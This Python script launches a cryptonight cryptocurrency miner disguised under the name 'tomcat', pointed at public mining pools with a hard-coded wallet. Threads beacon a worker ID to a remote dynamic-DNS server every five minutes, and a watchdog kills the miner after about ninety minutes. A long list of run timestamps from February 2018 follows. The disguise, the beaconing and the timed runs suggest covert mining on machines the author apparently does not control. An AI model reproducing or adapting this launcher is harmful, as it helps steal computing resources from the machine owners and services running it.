import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:35:08.110338
#2018-02-17 17:24:06.982983
#2018-02-17 19:13:05.933665
#2018-02-17 21:01:07.475049
#2018-02-17 22:46:05.995728
#2018-02-18 00:32:02.240388
#2018-02-18 02:22:03.962456
#2018-02-18 04:09:04.752955
#2018-02-18 05:58:07.354672
#2018-02-18 07:50:04.795978
#2018-02-18 09:38:05.114347
#2018-02-18 11:25:06.588128
#2018-02-18 13:12:02.191520
#2018-02-18 15:01:05.515603
#2018-02-18 16:49:06.059318
#2018-02-18 18:37:04.046144
#2018-02-18 20:24:07.123148
#2018-02-18 22:10:03.606333
#2018-02-18 23:58:01.741150
#2018-02-19 01:44:06.271458
#2018-02-19 03:34:01.352684
#2018-02-19 05:19:04.191692
#2018-02-19 07:06:06.384681
#2018-02-19 08:55:05.407428
#2018-02-19 10:44:09.937974
#2018-02-19 12:33:08.311535
#2018-02-19 14:19:01.655079
#2018-02-19 16:07:06.036654
#2018-02-19 17:56:01.731397
#2018-02-19 19:43:05.010591
#2018-02-19 21:32:06.527053
#2018-02-19 23:18:06.478944
#2018-02-20 01:04:02.215363
#2018-02-20 02:53:03.659732
#2018-02-20 04:40:09.616159
#2018-02-20 06:24:01.516968
#2018-02-20 08:09:01.292728
#2018-02-20 09:55:07.636650
#2018-02-20 11:40:05.779304
#2018-02-20 13:27:04.389115
#2018-02-20 15:11:09.242889
#2018-02-20 16:56:07.993321
#2018-02-20 18:45:12.478996
#2018-02-20 20:36:05.958368
#2018-02-20 22:22:06.923575
#2018-02-21 00:03:06.626107
#2018-02-21 01:49:08.044913
#2018-02-21 03:32:02.219652
#2018-02-21 05:21:06.251939
#2018-02-21 07:08:06.835337
#2018-02-21 08:53:07.758021
#2018-02-21 10:41:06.968742
#2018-02-21 12:27:08.572625
#2018-02-21 14:14:02.140500
#2018-02-21 16:01:07.205386
#2018-02-21 17:52:06.244247
#2018-02-21 19:38:09.950160
#2018-02-21 21:26:01.648245
#2018-02-21 23:12:07.170019
#2018-02-22 00:59:05.379162
#2018-02-22 02:48:01.621496
#2018-02-22 04:33:06.591156
#2018-02-22 06:18:08.149559
#2018-02-22 08:04:06.452619
#2018-02-22 09:52:08.205049
#2018-02-22 11:38:06.575902
#2018-02-22 13:25:07.742223
#2018-02-22 15:15:03.738258
#2018-02-22 17:01:09.011713
#2018-02-22 18:49:10.038653
#2018-02-22 20:42:04.325521
#2018-02-22 22:27:14.402328
#2018-02-23 00:12:06.449006
#2018-02-23 02:01:05.988825
#2018-02-23 03:49:05.101132
#2018-02-23 05:38:07.259288
#2018-02-23 07:23:05.712356
#2018-02-23 09:29:01.836038
#2018-02-23 11:37:01.634913
#2018-02-23 13:25:07.113202
#2018-02-23 15:12:06.476805
#2018-02-23 17:01:01.540435
#2018-02-23 18:49:08.436506
#2018-02-23 20:36:06.280889
#2018-02-23 22:23:04.895840
#2018-02-24 00:08:06.757280
#2018-02-24 01:58:07.612249
#2018-02-24 03:50:07.449451
#2018-02-24 05:37:07.079094
#2018-02-24 07:24:07.855465
#2018-02-24 09:14:05.702152
#2018-02-24 11:04:07.497323
#2018-02-24 12:53:01.323072
#2018-02-24 14:41:06.507886
#2018-02-24 16:32:02.220357
#2018-02-24 18:22:03.992071
#2018-02-24 20:09:01.620733
#2018-02-24 21:53:04.044554
#2018-02-25 00:54:01.779262
#2018-02-25 04:41:07.766419
#2018-02-25 08:37:01.670687